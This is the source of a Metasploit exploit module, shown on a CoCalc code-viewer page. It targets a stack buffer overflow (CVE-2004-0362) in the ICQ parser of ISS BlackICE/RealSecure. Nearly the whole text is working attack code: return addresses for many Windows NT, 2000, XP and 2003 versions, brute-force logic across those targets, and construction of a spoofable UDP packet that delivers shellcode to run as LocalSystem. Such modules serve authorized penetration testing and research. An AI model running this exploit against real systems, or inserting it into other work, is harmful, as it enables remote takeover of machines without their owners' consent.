Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/firewall/blackice_pam_icq.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Udp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'ISS PAM.dll ICQ Parser Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in the ISS products that use

18
          the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation

19
          will result in arbitrary code execution as LocalSystem. This exploit

20
          only requires 1 UDP packet, which can be both spoofed and sent to a broadcast

21
          address.

22


23
          The ISS exception handler will recover the process after each overflow, giving

24
          us the ability to bruteforce the service and exploit it multiple times.

25
        },

26
        'Author' => 'spoonm',

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2004-0362'],

30
          ['OSVDB', '4355'],

31
          ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html']

32
        ],

33
        'Payload' => {

34
          'Space' => 504 - 31 - 4,

35
          'BadChars' => "\x00",

36
          'MinNops' => 0,

37
          'MaxNops' => 0,

38
          'StackAdjustment' => -3500

39
        },

40
        'Platform' => 'win',

41
        'Targets' => [

42
          [ 'Bruteforce', {} ],

43
          [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3..4 } ],

44
          [ 'Bruteforce NT 4.0', { 'Targets' => 5..15 } ],

45
          [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ],

46
          [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ],

47
          [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ],

48
          [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ],

49
          [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ],

50
          [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ],

51
          [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ],

52
          [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ],

53
          [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ],

54
          [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ],

55
          [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ],

56
          [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ],

57
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],

58
          [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ],

59
          [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ],

60
          [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ],

61
          [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],

62
          [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],

63
          [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ],

64
          [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ],

65
        ],

66
        'DisclosureDate' => '2004-03-18',

67
        'DefaultTarget' => 0,

68
        'Notes' => {

69
          'Reliability' => UNKNOWN_RELIABILITY,

70
          'Stability' => UNKNOWN_STABILITY,

71
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

72
        }

73
      )

74
    )

75


76
    register_options(

77
      [

78
        Opt::RPORT(1)

79
      ]

80
    )

81
  end

82


83
  def exploit

84
    datastore['RPORT'] = rand(65536) if rport == 1

85


86
    targs = [ target ]

87


88
    if target.name =~ /^Brute/

89
      if target['Targets']

90
        targs = []

91


92
        target['Targets'].each { |idx|

93
          targs << targets[idx]

94
        }

95
      else

96
        targs = targets.dup

97


98
        targs.delete_at(0)

99
        targs.delete_at(0)

100
        targs.delete_at(0)

101
      end

102
    end

103


104
    targs.each { |targ|

105
      print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

106


107
      shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)

108
      email = rand_text_english(19) + [targ.ret].pack('V') + shellcode

109


110
      # Hopefully this structure is correct -- ported from msf 2.  Blame me

111
      # (skape) if it doesn't work!

112
      packet =

113
        # SRV_MULTI

114
        [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +

115
        # SRV_USER_ONLINE

116
        [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +

117
        [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +

118
        # SRV_META_USER

119
        [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +

120
        "\x00\x00\x0a" + # subcommand / success

121
        "\x00\x00" + # nick length / nick

122
        "\x00\x00" + # first length / first

123
        "\x00\x00" + # last length / last

124
        [email.length].pack('v') + email +

125
        "\x00\x00\x00\x00\x00\x00\x00"

126


127
      print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

128


129
      connect_udp(true, { 'CPORT' => 4000 })

130
      udp_sock.put(packet)

131
      disconnect_udp

132


133
      print_status("Sleeping (giving exception handler time to recover)")

134


135
      select(nil, nil, nil, 5)

136
    }

137
  end

138
end

139


140